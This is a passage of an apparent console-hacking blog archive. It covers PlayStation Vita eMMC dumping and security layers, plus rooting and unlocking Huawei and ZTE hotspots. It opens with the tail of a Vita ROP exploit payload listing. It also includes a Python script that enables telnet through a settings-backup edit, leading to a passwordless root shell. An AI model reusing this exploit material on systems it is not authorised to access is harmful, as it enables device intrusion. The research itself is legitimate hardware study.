0x08B475C4: 0x08B474A8 ; R1
0x08B475C8: 0x0020E780 ; if (flags) *R0 = R1 = 0x08B474A8 (loop), LDMFD   SP!, {R4,PC}
0x08B475CC: 0x002C2215 ; R4, dummy
0x08B475D0: 0x0010FFFD ; (nop) POP {PC}
0x08B475D4: 0x0010FFFD ; (nop) POP {PC}
0x08B475D8: 0x00103DA8 ; LDMFD   SP!, {R4-R12,PC}
0x08B475DC: 0x002D5654 ; R4, dummy
0x08B475E0: 0x00103778 ; R5, dummy
0x08B475E4: 0x002FA864 ; R6, dummy
0x08B475E8: 0x00119B94 ; R7, dummy
0x08B475EC: 0x0020E780 ; R8, dummy
0x08B475F0: 0x00128605 ; R9, dummy
0x08B475F4: 0x00103DA8 ; R10, dummy
0x08B475F8: 0x08B475F8 ; R11, dummy
0x08B475FC: 0x0010FFFD ; R12, dummy
0x08B47600: 0x0018114C ; LDMFD   SP!, {R4-R6,LR}
0x08B47604: 0x0010FFFD ; R4, dummy
0x08B47608: 0x002FC8E4 ; R5, dummy
0x08B4760C: 0x001037E0 ; R6, dummy
0x08B47610: 0x0023C494 ; LR (later set to 0x08B474A8)
0x08B47614: 0x002D6A30 ; SP = LR, LDMFD   SP!, {LR,PC}
... END OF ROP PAYLOAD ...
0x08B47618: 0x08F01000 ; buffer
0x08B4761C: 0x002D6A1C ; 
0x08B47620: 0x08B47400 ; 
0x08B47624: 0x0010FFFD ; 
0x08B47628: 0x0010FFFD ; 
0x08B4762C: 0x002D6A1C ; 
0x08B47630: L"dmc:/Launcher.dat"
0x08B47654: 0x00000000 ; 
0x08B47658: 0x00000000 ; 
0x08B4765C: 0x00000000 ; 
0x08B47660: 0x00000000 ; 
0x08B47664: 0x00000000 ; 
0x08B47668: 0x00000000 ; 
0x08B4766C: 0x002D6A1C ; 
0x08B47670: 0x00000000 ; 
0x08B47674: 0x00000000 ; 
0x08B47678: 0x00000000 ; 
0x08B4767C: 0x00000000 ; 
0x08B47680: 0x00000000 ; 
0x08B47684: 0x00000000 ; 
0x08B47688: 0x00000000 ; 
0x08B4768C: 0x00000000 ; 
0x08B47690: 0x00000000 ; 
0x08B47694: 0x00000000 ; 
0x08B47698: 0x00000000 ; 
0x08B4769C: 0x00000000 ; 
0x08B476A0: 0x00000000 ; 
0x08B476A4: 0x00000000 ; 
0x08B476A8: 0x00000000 ; 
0x08B476AC: 0x00000000 ; 
0x08B476B0: 0x00000000 ; 
0x08B476B4: 0x00000000 ; 
0x08B476B8: 0x00000000 ; 
0x08B476BC: 0x00000000 ; 
0x08B476C0: 0x00000000 ; 
0x08B476C4: 0x00000000 ; 
0x08B476C8: 0x00000000 ; 
0x08B476CC: 0x00000000 ; 
0x08B476D0: 0x00000000 ; 
0x08B476D4: 0x00000000 ; 
0x08B476D8: 0x00000000 ; 
0x08B476DC: 0x00000000 ; 
0x08B476E0: 0x00000000 ; 
0x08B476E4: 0x00000000 ; 
0x08B476E8: 0x00000000 ; 
0x08B476EC: 0x00000000 ; 
0x08B476F0: 0x00000000 ; 
0x08B476F4: 0x00000000 ; 
0x08B476F8: 0x00000000 ; 
0x08B476FC: 0x00000000 ; 

Dumping the Vita NAND

When we last left off, I had spent an excess of 100 hours (I’m not exaggerating since that entire time I was working, I listened to This American Life and went through over a hundred one-hour episodes) soldering and tinkering with the Vita logic board to try to dump the eMMC. I said I was going to buy an eMMC socket from taobao (the socket would have let me clamp an eMMC chip down while pins stick out, allowing the pressure to create a connection). However, I found out that all the sellers of the eMMC socket on taobao don’t ship to the USA, and American retailers sell the sockets for $300 (the cheapest I could find). So I took another approach.

Packet Sniffing

My first hypothesis on why it is not working is that there’s some special initialization command that the eMMC requires. For example, CMD42 of the MMC protocol allows password protection on the chip. Another possibility was that the chip resets into boot mode, which the SD card reader doesn’t understand. To clear any doubts, I connected CLK, CMD, and DAT0 to my Saleae Logic clone I got from eBay.

Vita eMMC points connected to logic analyzer.


As you can see from the setup, I had the right controller board attached so I can get a power indicator light (not required, but useful). I also took the power button out of the case and attached it directly. The battery must be attached for the Vita to turn on. Everything is Scotch-taped to the table so it won’t move around. Once all that is done, I captured the Vita’s eMMC traffic on startup.

First command sent to eMMC on startup


After reading the 200-page eMMC specification, I understood the protocol and knew what I was looking at. The very first command sent to the eMMC is CMD0 with argument 0x00000000 (GO_IDLE_STATE). This is significant for two reasons. First, we know that the Vita does NOT use the eMMC’s boot features. The Vita does not have its first stage bootloader on the eMMC, and boots either from (most likely) an on-chip ROM or (much less likely) some other chip (that mystery chip on the other side maybe?). Second, it means that there’s no trickery; the eMMC is placed directly into Idle mode, which is what SD cards go into when they are inserted into a computer. This also means that the first data read from the eMMC is in the user partition (not the boot partition), so the second or third stage loader must be in the user partition of the eMMC. For the unfamiliar, the user partition is the “normal” data that you can see at any point, while the boot partition is a special partition only exposed in boot mode (and AFAIK, not supported by any USB SD card reader). Because I don’t see the boot partition used, I never bothered to try to dump it.
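For readers who want to recognize such a command in their own captures, here is a sketch of how the 48-bit frame on the CMD line is put together, as I understand the SD/MMC command format: a start bit, a transmission bit, a 6-bit command index, a 32-bit argument, a CRC7 and an end bit. The function names are my own.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* CRC7 with polynomial x^7 + x^3 + 1, computed MSB first. */
uint8_t mmc_crc7(const uint8_t *data, size_t len)
{
    uint8_t crc = 0;
    for (size_t i = 0; i < len; i++) {
        uint8_t d = data[i];
        for (int bit = 0; bit < 8; bit++) {
            crc = (uint8_t)(crc << 1);
            if ((d ^ crc) & 0x80)
                crc ^= 0x09;
            d = (uint8_t)(d << 1);
        }
    }
    return crc & 0x7F;
}

/* Build the 6-byte frame: 01 | index (6 bits) | argument | CRC7 | 1. */
void mmc_build_command(uint8_t index, uint32_t arg, uint8_t frame[6])
{
    assert(index < 64);
    frame[0] = (uint8_t)(0x40 | index);
    frame[1] = (uint8_t)(arg >> 24);
    frame[2] = (uint8_t)(arg >> 16);
    frame[3] = (uint8_t)(arg >> 8);
    frame[4] = (uint8_t)arg;
    frame[5] = (uint8_t)((mmc_crc7(frame, 5) << 1) | 1);
}
```

For CMD0 with argument 0x00000000 this produces the bytes 40 00 00 00 00 95, which is the pattern to look for at the start of a capture.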

Dumping

I tried a dozen times last week on two separate Vita logic boards trying to dump the NAND with no luck. Now that I’m on my third (and final) Vita, I decided to try something different. First, I did not remove the resistors sitting between the SoC and eMMC this time. This is because I wanted to capture the traffic (see above) and also because I am much better at soldering now and the tiny points don’t scare me anymore. Second, because of my better understanding of the MMC protocol (from the 200-page manual I read), I no longer attempted to solder DAT1-DAT3 because that takes more time and gives more chance of error due to bad connections. I only connected CLK, CMD, and DAT0. I know that on startup, the eMMC is placed automatically into 1-bit read mode and must be switched to 4-bit (DAT0-DAT3) or 8-bit (DAT0-DAT7) read mode after initialization. My hypothesis was that there must be an SD card reader that follows the specification’s recommendation and dynamically chooses the bus width based on how many wires can be read correctly (I also guessed that most readers don’t do this because SD cards always have four data pins). To test this, I took a working SD card and insulated the pins for DAT1-DAT3 with tape. I had three SD card readers and the third one worked! I know that that reader can operate in 1-bit mode, so I took it apart and connected it to the Vita (CLK, CMD, DAT0, and ground).

As you can see, more tape was used to secure the reader.


I plugged it into the computer and… nothing. I also saw that the LED read indicator on the reader was not on, and a multimeter showed that the reader was not outputting any power either. That’s weird. I then put a working SD card in and the LED light turned on. I had an idea. I took the SD card and insulated every pin except Vdd and Vss/GND (taped over every other pin) and inserted the SD card into the reader. The LED light came on. I guess there’s an internal switch that gets turned on when it detects a card is inserted because it tries to draw power (I’m not hooking up Vdd/Vss to the Vita because that’s more wires and I needed a 1.8V source for the controller and it’s just a lot of mess; I’m using the Vita’s own voltage source to power the eMMC). I then turned on the Vita, and from the flashing LED read light, I knew it was successful.

LED is on and eMMC is being read


Analyzing the NAND

Here’s what OSX has to say about the eMMC:

Product ID: 0x4082
Vendor ID: 0x1e3d (Chipsbrand Technologies (HK) Co., Limited)
Version: 1.00
Serial Number: 013244704081
Speed: Up to 480 Mb/sec
Manufacturer: ChipsBnk
Location ID: 0x1d110000 / 6
Current Available (mA): 500
Current Required (mA): 100
Capacity: 3.78 GB (3,779,067,904 bytes)
Removable Media: Yes
Detachable Drive: Yes
BSD Name: disk2
Partition Map Type: Unknown
S.M.A.R.T. status: Not Supported

I used good old “dd” to copy the entire /dev/rdisk2 to a file. It took around one and a half hours to read the entire eMMC (1-bit mode is very slow). I opened it up in a hex editor and, as expected, the NAND is completely encrypted. To verify, I ran a histogram on the dump and got the following result: 78.683% byte 0xFF and almost exactly 0.084% for every other byte. 0xFF blocks indicate free space, and such an even distribution of all the other bytes means that the file system is completely encrypted. For good measure, I also ran “strings” on it and could not find any readable text. If we assume that about 78.6% of the NAND is free space (0xFF indicates free space, and the encrypted data should itself contain roughly 0.084% 0xFF bytes, given the even distribution of the other byte values), then the remaining 21.4% of the 3,779,067,904 bytes, or about 808.7MB, is used. That’s a pretty hefty operating system in comparison to the PSP’s 21MB flash0.
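The estimate can be reproduced from a dump with a few lines of code. This is a sketch of the reasoning rather than the tool I actually used: it counts byte values and then assumes, as above, that free space is all 0xFF and that encrypted data is uniformly distributed. The function names are illustrative.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Count how often each byte value occurs in a buffer. */
void byte_histogram(const uint8_t *data, size_t len, uint64_t counts[256])
{
    assert(data != NULL || len == 0);
    for (int v = 0; v < 256; v++)
        counts[v] = 0;
    for (size_t i = 0; i < len; i++)
        counts[data[i]]++;
}

/*
 * Estimate the number of used (encrypted) bytes. Only the 255 non-0xFF
 * values are counted directly; uniform data would contain the same share
 * of 0xFF bytes, so the total is scaled by 256/255 to account for them.
 */
double estimate_used_bytes(const uint64_t counts[256])
{
    uint64_t non_ff = 0;
    for (int v = 0; v < 255; v++)
        non_ff += counts[v];
    return (double)non_ff * 256.0 / 255.0;
}
```

Plugging in the figures above, 21.317% of the dump is not 0xFF; scaled by 256/255 that is about 21.4% of 3,779,067,904 bytes, or about 808.7MB. For a real dump the histogram would be accumulated chunk by chunk while reading the file rather than from one buffer.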

What’s Next

It wasn’t a surprise that the eMMC is completely encrypted. That’s what everyone suspected for a while. What would have been surprising is if it WASN’T encrypted, and that tiny hope was what fueled this project. We now know for a fact that modifying the NAND is not a viable way to hack the device, and it’s always good to know something for sure. For me, I learned a great deal about hardware and soldering and interfaces, so in my free time, I’ll be looking into other things like the video output, the mystery connector, the memory card, and the game cards. I’ve also sent the SoC and the two eMMC chips I removed to someone for decapping, so we’ll see how that goes once the process is done. Meanwhile, I’ll also work more with software and try some ideas I picked up from the WiiU 30C3 talk. Thanks again to everyone who contributed and helped fund this project!

Accounting

In the spirit of openness, here’s all the money I’ve received and spent over the duration of this hardware hacking project:

Collected: $110 WePay, $327.87 PayPal, and 0.1BTC

Assets

Logic Analyzer: $7.85
Broken Vita logic board: $15.95
VitaTV x 2 (another for a respected hacker): $211.82
Rework station: $80
Broken 3G Vita: $31
Shipping for Chips to be decapped: $1.86

Total: $348.48 (I estimated/asked for $380)

I said I will donate the remaining money to EFF. I exchanged the 0.1BTC to USD and am waiting for mtgox to verify my account so I can withdraw it. $70 of donations will not be given to the EFF by the request of the donor(s). I donated $25 to the EFF on January 10, 2014, 9:52 pm and will donate the 0.1BTC when mtgox verifies my account (this was before I knew that EFF takes BTC directly).

Why hacking the Vita is hard (or: a history of first hacks)

It’s been about a year since I revealed the first userland Vita exploit and I still occasionally get messages asking “what happened” (not much) or “when can I play my downloaded games” (hopefully never) or “I want homebrew” (me too). While I don’t have anything new exploitwise (same problems as before: no open SDK, lack of interest in the development community, lack of time on my part), I do want to take the time and go over why it’s taking so long.

Where are the hackers?

A common (and valid) complaint I hear is that there is a lack of hackers (a word I hate) working on the Vita. The fail0verflow team has a great post about console hacking that applies just as well to the Vita. In short, there isn’t as much value in hacking a console now as there was before. Not too long ago, the PSP and DS were the only portable devices people owned that played games and, for many people, the only portable devices they owned, period. I had a DS Lite that I carried everywhere long before I had a smartphone. But then I got a smartphone (and so did everyone else). iPhones and Androids (and don’t forget Windows Phone) are the perfect platform for what we used to call homebrew. Indie developers who want to write a portable game no longer have to use a hacked PSP and an open SDK. Writing apps is much easier and much more profitable. Meanwhile users can play all the emulators they want on their Android phone or their jailbroken iPhone. The demand for hacked consoles shrunk dramatically with those two audiences gone. Plus, with smartphones gaining a larger audience while the Vita barely sells (which by the way is a tragedy since it’s a pretty awesome console), a hacker can get a lot more attention (or, for those who seek “donations”, a lot more money) spending time rooting phones that are coming out every month.

But [insert device here] was hacked very quickly, we just need more people working, right?

To some extent, that is true, but even with a large group of talented reverse engineers, I would not bet that the Vita would be hacked any time soon. To be clear here, when I say “hacked,” I refer to completely owning the device to the point that decryption keys are found and unsigned code can be run in kernel mode (or beyond). The problem is that even talented reverse engineers (who can read assembly code and find exploits) are out of luck when they don’t have the code to work with. I mentioned this circular problem before, but to restate it: you need to have access to the code before you can exploit it, and to get access to the code, you need to exploit it. But, if that’s the case, you ask, how would any device ever be hacked? That is why I believe that the first (real) hack of any device is the most important. Let’s look at some examples of “first hacks” and see why it doesn’t work with the Vita.

Insecure First Version

This is the most common situation. Let’s look at the PSP. The 1.00 firmware ran unsigned code out of the box. Someone found a way to access the filesystem, and saw that the kernel modules were unencrypted. They analyzed the kernel modules and found an exploit and owned the system. All it takes is to have an unreleased kernel exploit from one firmware version; then update to the next one; exploit it and dump the new kernel to find more exploits. Rinse and repeat.

Same with the iPhone. The first version(s) allowed you to read from the filesystem through iBoot. It was a matter of dumping the filesystem, analyzing the (unencrypted) binaries, and creating exploits. Plus, the kernel is from the same codebase as OSX, so analyzing it was not as difficult as looking at a new codebase.

The Vita, however, has a fairly secure original firmware. No filesystem access (even to the memory card), proper encryption of things that do come out of the device, and very few areas of interaction in general (you have CMA and that’s pretty much it).

Similarities to other Devices

Most Android phones fall into this category. One Android root will most likely work across multiple manufacturers. Plus, Android is open source, so it’s a matter of searching for an exploit. Once the device is rooted, someone has to find a way to dump the bootloader (which for many phones is just a matter of reading from a /dev/ endpoint), and analyze the bootloader for a way to root it.

The Kindle Touch (which I was the first to jailbreak) ran essentially the same software as the Kindle 3 and had a debugging console port.

The Vita has similarities to the PSP, but most of the system is different. With multitasking support, the Vita memory model is completely different from PSP and has proper abstraction of virtual memory. The Vita has NetBSD code, but the kernel is completely proprietary. No PSP exploit will work on the Vita.

Hardware Methods

This is usually the “last resort” because it takes the most skill and money to perform. This usually involves physically dumping the RAM with hardware to analyze the code. The most recently hacked console, the 3DS, had this done. I believe the first Wii hack was developed with a hardware RAM dumper. Many consoles had some kind of hardware analysis done before the first hack was developed.

It would be very hard to do a hardware hack on the Vita. The system memory is on the same chip as the CPU, so you cannot try to piggyback the RAM. Plus anyone doing a hardware hack would have to have expert electrical engineering skills and access to expensive tools.

 

The story always starts with getting access to the code, then finding an exploit, and then using that exploit to get more code to find more exploits in the future. Most of the jailbreaks, roots, and hacks you see are developed with information gathered from a previous hack. I believe that Sony knows this and really made sure that their device does not suffer from any of the flaws I listed. Lots of people make fun of Sony for not handling security well, but after spending countless hours on the Vita, I can honestly say that the Vita is one of the most secure devices I’ve ever seen. So far, they seem to have done everything well: using all the security features in modern computers and not trusting any code. But, as we have learned countless times, nothing is completely secure.

EDIT: I’m seeing a lot of comments speculating that the Vita slim or Vita TV may help with hacking it. In my opinion, this is grasping at straws. There is no evidence that a minor revision of the console will magically create software or hardware holes.

Huawei E587 (T-Mobile 4G Sonic Hotspot): Information and rooting

Earlier this year, I got my hands on the T-Mobile 4G Sonic Hotspot and as always, had to tear it apart as soon as I got it. I never wrote about it because I didn’t find anything overly interesting, but now it’s the end of the year, and I need to clear some inventory from my brain. If anyone remembers my post on the (older) T-Mobile 4G Hotspot (sans “Sonic”), the main limitation of that device was that the processor is an obscure one that required some digging to get information on. Thankfully, the Sonic variety is much easier to break into.

Teardown

I don’t usually do this, but as I couldn’t find any good snapshots of the insides of this device, I took it upon myself to produce some amateur shots. One thing I want to say about the insides is that I loved how the main board is broken into three parts and they’re sandwiched together to make the device small (but thick).

Device with faceplate removed.

FreeScale MCIMX283CVM4B

Qualcomm MDM8220 modem

Middle layer, containing various chips

The important information is that the device is ARM based (it even uses the same system-on-chip as older Kindles), and having a well documented SoC is always a plus. There isn’t an obvious debug serial port, but I would bet that there is one knowing how the FreeScale SoCs work. However, we don’t need to explore hardware hacking yet as the software is unexplored.

Rooting

This was literally the easiest device I’ve ever rooted. I can honestly say that going from opening the package (knowing nothing about the device) to getting a root shell took me about fifteen minutes. There was only one interface to the device, and that’s the management webpage. My plan was to explore every location where I could pass input to the device (settings, HTTP POST requests, MicroSD file browser, etc.) and basically just try things until I got a crash or something interesting. The first thing I tried was the settings backup/restore feature. Creating a backup of the settings allows you to download a SQLite database containing the settings. A quick SQL dump of the settings showed me some interesting options that can’t be set directly from the web interface, including:

CREATE TABLE telnet
(
TelnetStatus int
);

Yep, setting TelnetStatus to 1 and restoring the backup database showed me that port 23 was now open on the hotspot’s IP. That was extremely lucky; as always, the best hacks are the ones that don’t require hacking at all. But that was only half the challenge. The next part was getting access to the root account. I was thinking of everything from brute forcing passwords to looking at privilege escalation exploits, but all of that disappeared as soon as I typed “root” and pressed enter, because there was no password prompt. That’s right, “root” doesn’t require a password. I did a quick inventory of the filesystem and found the block devices, and using the magic of dd, nc, and the old Unix pipe, quickly dumped all the filesystems.
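The settings edit itself can be scripted. Here is a minimal sketch in Python, assuming the backup is a plain SQLite file containing the telnet table shown above. The function name and the handling of an empty table are my own assumptions, not something the device documents.

```python
import sqlite3

def enable_telnet(backup_path):
    """Set TelnetStatus to 1 in a downloaded settings backup (a SQLite file).

    The table and column names come from the dump above; everything else
    here is an illustrative assumption.
    """
    conn = sqlite3.connect(backup_path)
    try:
        with conn:  # commits on success, rolls back on error
            cur = conn.execute("UPDATE telnet SET TelnetStatus = 1")
            if cur.rowcount == 0:
                # Assumption: if the table has no row yet, add one.
                conn.execute("INSERT INTO telnet (TelnetStatus) VALUES (1)")
        # Read the value back so the caller can confirm the change.
        return conn.execute("SELECT TelnetStatus FROM telnet").fetchone()[0]
    finally:
        conn.close()
```

The modified file would then be uploaded through the web interface’s restore feature, as described above.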

Software

Here’s the thing though: I spent all this time (almost 45 minutes at this point!) rooting the device and I didn’t even have a clear goal. I didn’t need to unlock the device because I was a T-Mobile customer at that point, and I didn’t really want to make a pocket ARM computer/server (which would be a thing one can do with this), so I just did a quick scan of how the device works (curiosity is the best excuse) and went on my way. Here are some of the things I discovered; use this information however you will.

First of all, the device runs a stripped down build of Android running “Linux version 2.6.31 (e5@e587) (gcc version 4.4.0 (GCC) ) #1 Sun Aug 28 02:25:47 CST 2011.” On startup, most of the vanilla Android processes (including adbd) are not started; instead, the Qualcomm modem driver, some pppd/networking daemons, and a custom piece of software they call “cms” are started. “cms” makes sure that things like their custom httpd (which is hard coded to allow the HTML portal site to perform functions on the hotspot), power management, and the OLED display are running and in good status. The Huawei device stores all data on its flash MTD device. From a quick analysis (aka, there might be errors), block 0 contains the u-boot bootloader (in what I believe is a format dictated by FreeScale), block 3 contains the kernel (gzipped with a custom header, possibly also dictated by FreeScale), block 4 contains the rootfs (also gzipped with a custom header) loaded with boot scripts and busybox, block 5 is Android’s /system, which also contains the main binaries (like cms and httpd) and the HTML pages, block 6 is Android’s /data, which is empty, block 8 maps to /mnt/backup, which I believe is, as the name says, just backups, block 12 maps to /mnt/flash, which I believe is where ephemeral data like logs live and also where the settings are stored, and block 13 maps to /mnt/cdrom, which has Huawei’s software and drivers for connecting to the computer (and is what you see when you plug the device into your computer).

That’s a quick summary of some of the things I’ve found while poking around this device. Nothing interesting (unless you’re a Huawei E587 fanatic I guess), but I’m sure there’s someone, someday, who got here from Google.

PlayStation Vita: the progress and the plan

Sorry that it’s been a while since I’ve said anything about the Vita. Last time, I was caught by surprise by all the media attention that came from just a simple call for help. While I still don’t want to say too much right now, I do want to answer some common questions I’ve been getting and also go over what needs to be done.

If this is news to you, please read this interview I did a while ago about it.

Did you hack the Vita? That’s a very vague question. What I have done is run native code on the Vita with the same permissions as the game being exploited. This means I can load homebrews written and optimized for the Vita’s CPU and take full advantage of the CPU speed and RAM (unlike the PSP emulator or PSM, both of which impose artificial limits on resources and system functions). What has NOT been done (yet) is unlocking the system completely for tasks like USB interfacing, custom themes/system mods/plugins, and (fortunately) pirating games.

What’s UVLoader and how far along is it? When I last spoke, I was beginning work on UVL and asked for any help I could get. Even though I did not really get help, I did find people who were interested in what I was doing, and we exchanged information. I also want to brag that I finished the main functionality of UVL in a couple of weeks, and it has been “done” for about three months now. (Quotes around “done” because I decided to not worry about some features yet.) That means I can basically load most compiled homebrews (“most” being the few that I manually built without an open SDK). You can run your standard hello worlds and spinning cubes and such, but in theory, it should load any homebrew built.

When’s the release? What’s taking so long? So as I’ve said, the loader was done three months ago. I have a couple of reasons for not releasing yet. The main reason is that currently, there is no open SDK for compiling and linking Vita homebrew like pspsdk did for the PSP. That means, even with the loader, it would be useless for users because there are no homebrew games, emulators, etc. to run, and it would be useless for developers because they can’t build homebrews either. So what’s the progress on the open SDK? Zero, as I’m typing this right now. I have an idea of what it should look like and I spoke to a couple of people who are interested in helping, but so far, no code is written. Why is that? Because I am very busy with lots of other unrelated things, and unfortunately, only a handful of other people and I know enough about the device, the executable format, and so on to make the open SDK, and none of us have the time currently.

The second reason is that having a Vita exploit at this stage (when it is really hard to find exploits) is very rare, if not a once in a lifetime thing. The others I’ve talked to and I agree that right now it’s more important to use this exploit to gather more information about the system, in order to find more exploits and such, than it is to run homebrews. We have PSM for homebrew games and the PSP emulator for homebrew emulators, so there really isn’t a huge demand for native PSVita homebrews yet. As I’ll expand on below, we’ve only scratched the surface of Vita hacking and there’s so much more to see.

Are you looking for testers/can I test UVLoader? There’s no need to “test” UVLoader right now because, as I’ve stated before, there isn’t any compiled homebrew and nothing to compile them with anyways. Yes, UVL works with some of the custom stuff I’ve built manually, but it is unwise to write complex stuff without a working SDK.

Can I help? Depends who you are. If you’re an established reverse engineer, you know how to contact me. If you just want to “beta test,” read above. If you know any other way of helping me, don’t ask, just do it™, since UVL is open source. I don’t accept monetary donations before I release anything. However, one thing that I and the others involved don’t have is funds for materials to test some of the more… risky ideas. If you have access to broken Vitas, memory cards, games, etc., or any unused hardware reversing tools like logic analyzers (anything you wouldn’t mind parting with) and could help in that respect, just use the contact link at the top of the page to get in touch with me.

What needs to be done to “hack” the Vita? Again, that term is very vague, but I know what you mean. This is the perfect time to describe (as far as I know) the Vita’s security structure and what needs to be done at each level.

PSP emulator

I’ll start with the PSP emulator just because that is what’s “hacked” right now. How much control do you have of the Vita when you use vHBL? Almost none. On the PSP itself, games are “sandboxed” (meaning some other process tells it what functions of the PSP can be used by the current game, main thing being that one game can’t load another game). Because the Vita emulates the PSP, it also emulates this structure.

PSP kernel

One level up, we have “kernel exploits” on the PSP, which means that we are no longer limited to what functions of the PSP we can use. Any PSP function that is emulated by the Vita can be used, that’s why you see ISO loading as the main thing. However, all of this, the PSP emulator, sits in the Vita game sandbox. This sandbox is just like the PSP one, in that another Vita process tells the game (in this case, the PSP emulator running some PSP game) what Vita functions can be used in a similar fashion. For example, if a game doesn’t explicitly declare that it’s going to use the camera or bluetooth (and Sony approves), any code that tries to use these functions will crash.

Vita userland

This is where UVLoader works; we exploited some game to run code inside its sandbox, meaning that if that game doesn’t have camera functions, no UVLoader Vita homebrew can use the camera either. This also means, of course, we can’t load pirated Vita games and so on. A fun fact here is that, in theory, if someone finds an exploit in Kermit, the system inside the PSP emulator that talks to the Vita through a virtual serial port, they can run UVLoader in the process hosting the emulator (one level higher than a PSP kernel exploit), meaning they may be able to modify the emulator to have more RAM, a faster CPU, and so on. Another advantage of running UVLoader here is that because the PSP emulator has access to more Vita hardware than most games (bluetooth, camera, etc.), homebrews could have more access too.

However, it’s easier said than done. It’s hard to appreciate how hard it is to get a Vita userland exploit. Let’s work backwards: we want to somehow run native ARM code, how? Well, the classic route is some stack smash. But wait, modern ARM processors have XN (eXecute Never), which is a feature that only allows code in memory to run at specific locations (these locations are determined by the kernel and are read only). Ok, we have some other choices here: heap overflows, ROP (google if you don’t know), and so on (assuming you even know you got a working exploit, which in itself is hard to know without additional information; most “crashes” are useless), but all of these choices require that you know enough about the system to create a payload fitted for the system. That means you need either a memory sniffer or some way to dump the memory. Well, let’s rule out hardware memory sniffing since the Vita has the RAM on the same system-on-a-chip as the CPU. How do we dump the memory then? Usually, you need to run some code to dump the memory or do some kind of oracle attack on crashes or error messages or something. Option one only works if we hacked the system before, and the second one, AFAIK, won’t work because the Vita doesn’t give any information when it crashes. So how did I get the first userland exploit? I’ll leave that as an exercise to the reader…

Vita kernel (lv2?)

Vita userland is the most we have access to right now and PSP kernel mode is the most that is public. What comes after? Remember, all information at this point could be wrong and is based off of the little evidence I have currently. We are in the Vita sandbox right now, which means we can run homebrew, but we can’t use functions that the game doesn’t use (camera, bluetooth, USB, etc.). We also can’t modify the system (run Linux, change the theme, add plugins, etc.). For those to work, we need to go one level up: the Vita kernel, which might be called lv2. Even with complete userland access, we can’t even poke at the kernel. The kernel acts like a black box, providing functions to the system through syscalls. You pass input into these syscalls and it returns some output, without revealing how the output is created. The kernel’s memory is separate from userland obviously, and even guessing what syscalls do (there are no names in the memory, only numbers) is a challenge. In order to hack the kernel, we have a problem that is very much like the one I’ve stated above about getting Vita userland, except with even more limitations. Again, there’s the circular problem of needing a kernel RAM dump to inspect for exploits and requiring a kernel exploit to dump the RAM. Now, there are even fewer “places” to inspect (visually and programmatically). In order of likelihood, one of the following needs to happen before there’s even a CHANCE of a kernel exploit: 1) Sony does something stupid like the PS3 keys leak, 2) we get REALLY lucky and basically stumble upon an exploit by just testing one of the several hundreds of syscalls with one of an infinite number of different inputs, 3) some information leaks out from Sony HQ.

It’s still unknown how much control we would have if kernel mode is compromised, but some others and I think that we MAY at least be able to do something like a homebrew enabler (HEN) that patches signature checks temporarily until reboot, allowing for homebrews with no sandbox limitations (access to camera, BT, etc.) and POSSIBLY system plugins and themes. It is very unlikely that any keys will be found at this point, or that we would be able to create or run a CFW.

Hypervisor? (lv1?)

At this point, it is purely a thought experiment, as we literally have no information beyond what we THINK the kernel does. It is highly possible that there is a hypervisor that makes sure everything running is signed and the kernel isn’t acting up and such. Getting to this would be EVEN HARDER than getting kernel, which I already think is impossible. Even kernel seems to be over my skill limit, but this would definitely be above me, and someone with real skills would have to attack this. I’m thinking that, at the very least, decaps will have to be attempted here. If somehow this gets hacked, we may be able to run CFWs, but like the PS3 before the lv0, newer firmwares would not be able to be CFW’d until…

Bootloader? (lv0?)

Again, only conjecture at this point, but this is the holy grail, the final boss. Once this is compromised, the Vita would be “hacked” in every sense of the word. We may never get here (and by never, I mean maybe 5-10 years, but I would most likely not be working on the Vita at that point). Here is where I think the keys are stored. With this compromised, CFW of any past, present, or future firmwares could be created, and anything would be possible.

Summary

I guess to summarize, the reason there’s no release in the foreseeable future isn’t just that I don’t have time to make an SDK, so there wouldn’t be homebrews to use even if UVL were released. Even if the SDK does get done, at this point, it would be more attractive to use the control we currently have, double down, and try to get more control. If the exploit is revealed prematurely, the game gets pulled and the firmware gets patched. Sure, we may get a fast N64 emulator in a couple of months when somebody has the chance to write it (and at that point, most people might be enticed to upgrade anyways for new firmware features and PSN access), but we would have to start at square one (read above about finding userland exploits) before having another chance at exploring the full potential of the system. Deep down, I am a researcher, and I have more interest in reversing the system than in making a release for users just so I could be the “first”. Like all gambles, I may end up with nothing, but that’s a risk I’m willing to take.

Unlocking T-Mobile 4G Hotspot (ZTE MF61): A case study

So, I have one of these MiFi clones from T-Mobile and want to unlock it to use on AT&T (I know that AT&T 4G/3G isn’t supported, but I thought maybe I could fix that later). The first thing I tried to do was contact T-Mobile, as they are usually very liberal concerning unlock codes. However, this time, T-Mobile (or, as they claim, the manufacturer) isn’t so generous. So I’ve decided to take it upon myself to do it. I will write down the entire procedure here as a case study on how to “reverse engineer” a new device. However, in no way do I consider myself an expert, so feel free to bash me in the comments on what I did wrong. Also, I have decided against releasing any binaries or patches because phone unlocking is a grey area (although it is legal here), but if you read along you should be able to repeat what I did, even though I will also try to generalize.

Getting information

The hardest part of any hack is the figuring-out-how-to-start phase. That’s always tricky. But… let the games begin.

-Wheatley, Portal 2

So before we can do anything, we need to know what to do. The best place to begin is to look at the updater. With a quick look at the extracted files, we find that the files being flashed have names such as “amss.mbn”, “dsp1.mbn”, and such. With a quick scan in a hex editor, we see that the files are unencrypted and unsigned. That’s good news because it means we have the ability to change the code. A quick Google search shows us that these files are firmware files for Qualcomm basebands. Now, we need to find more information on this Qualcomm chip. You may try some more Google-fu, but I took another path and took apart the device (not recommended if it’s any more complicated). In this case, I found that we are dealing with a Qualcomm MDM8200A device. Google that and you’ll find more information, such as that there are two DSP processors for the modem and one “apps” ARM processor (presumably for T-Mobile’s custom firmware, which is what you see as the web interface). We want to unlock the device, so I assume the work is done in the DSP processor. That’s the first problem. QDSP6 (I found this name through more Google skills) is not a supported processor in IDA Pro, my go-to tool, so we need another way to disassemble it.

Disassembly

